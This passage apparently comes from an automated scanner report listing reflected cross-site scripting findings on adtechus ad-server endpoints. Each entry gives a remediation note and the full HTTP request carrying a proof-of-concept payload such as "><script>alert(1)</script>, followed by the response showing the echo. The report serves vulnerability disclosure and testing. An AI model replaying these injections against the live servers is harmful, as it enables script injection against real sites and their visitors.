function __flushCode() { if (!__bCodeFlushed) { var span = parent.document.createElement("SPAN" ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/5132/1229906/0/225/AdId=1423870;BnId=9;itime=921573158;nodecode=yes;link=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=2bb3a'-alert(1)-'39269acb9b9http://www.autotrader.com/hornav/trader/index.jsp?LNX=SYCVIDSCI728" target="_blank"> ...[SNIP]...
4.5. http://adserver.adtechus.com/addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5c4f'-alert(1)-'8df45306b31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&e5c4f'-alert(1)-'8df45306b31=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript
function __flushCode() { if (!__bCodeFlushed) { var span = parent.document.createElement("SPAN" ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/5132/1229906/0/225/AdId=1423870;BnId=10;itime=921573573;nodecode=yes;link=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&e5c4f'-alert(1)-'8df45306b31=1http://www.autotrader.com/hornav/trader/index.jsp?LNX=SYCVIDGLITT728" target="_blank"> ...[SNIP]...
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db26e'-alert(1)-'0d3ee1d5280 was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=225700573b6576db26e'-alert(1)-'0d3ee1d5280 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 302
4.7. http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserver.adtechus.com
Path: /addyn/3.0/5242.1/1199874/0/16/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87d4c'-alert(1)-'a66e2a6ecfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=225700573b6576&87d4c'-alert(1)-'a66e2a6ecfb=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 305
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d27a"-alert(1)-"23d787d5a6f was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b65766d27a"-alert(1)-"23d787d5a6f HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 1454
4.9. http://adserver.adtechus.com/addyn/3.0/5242.1/1200349/0/225/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/addyn/3.0/5242.1/1200349/0/225/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b1ea"-alert(1)-"2fbf835ceb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b6576&1b1ea"-alert(1)-"2fbf835ceb6=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 19251
function __flushCode() {
if (!__bCodeFlushed) {
var span = parent.document.createElement("SPAN"
...[SNIP]...
ICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5242/1201431/0/225/AdId=1283446;BnId=5;itime=920485366;key=225700573b6576&1b1ea"-alert(1)-"2fbf835ceb6=1;nodecode=yes;link=") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserv
...[SNIP]...
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea3c6'-alert(1)-'ba2d61c4899 was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Software_HP_Bottom_728x90;key=225700573b6576ea3c6'-alert(1)-'ba2d61c4899 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 328
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c264a"-alert(1)-"99d36684df2 was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Software_HP_Bottom_728x90;key=225700573b6576c264a"-alert(1)-"99d36684df2 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 1135
4.12. http://adserver.adtechus.com/addyn/3.0/5242.1/1200449/0/225/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/addyn/3.0/5242.1/1200449/0/225/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72594'-alert(1)-'805f5bcf179 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Software_HP_Bottom_728x90;key=225700573b6576&72594'-alert(1)-'805f5bcf179=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 1144
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5308d'-alert(1)-'e15412e718f was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200533/0/16/ADTECH;alias=InformationWeek_Software_HP_Pagepeel_1x1;key=225700573b65765308d'-alert(1)-'e15412e718f HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 302
4.14. http://adserver.adtechus.com/addyn/3.0/5242.1/1200533/0/16/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/addyn/3.0/5242.1/1200533/0/16/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 718fe'-alert(1)-'ef1ab54d48e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200533/0/16/ADTECH;alias=InformationWeek_Software_HP_Pagepeel_1x1;key=225700573b6576&718fe'-alert(1)-'ef1ab54d48e=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 305
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fadbd"><script>alert(1)</script>a72a2aad66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframefadbd"><script>alert(1)</script>a72a2aad66/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 395
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4411"><script>alert(1)</script>ac47f18584 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0e4411"><script>alert(1)</script>ac47f18584/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 395
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ad4"><script>alert(1)</script>a8e06f27e2c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132a8ad4"><script>alert(1)</script>a8e06f27e2c/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 396
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7292a"><script>alert(1)</script>cdc932fa922 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/12299067292a"><script>alert(1)</script>cdc932fa922/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 396
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55314"><script>alert(1)</script>2025c2eac3c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/055314"><script>alert(1)</script>2025c2eac3c/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 396
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb5f"><script>alert(1)</script>5de7a93b83c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/0/2257eb5f"><script>alert(1)</script>5de7a93b83c/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 396
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2499b"><script>alert(1)</script>0337affee79 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D12969215771262499b"><script>alert(1)</script>0337affee79;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 396
The value of the kvq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c7c"><script>alert(1)</script>73aeac3c218 was submitted in the kvq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=e5c7c"><script>alert(1)</script>73aeac3c218 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 396
4.23. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e34"><script>alert(1)</script>42beed0cd1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
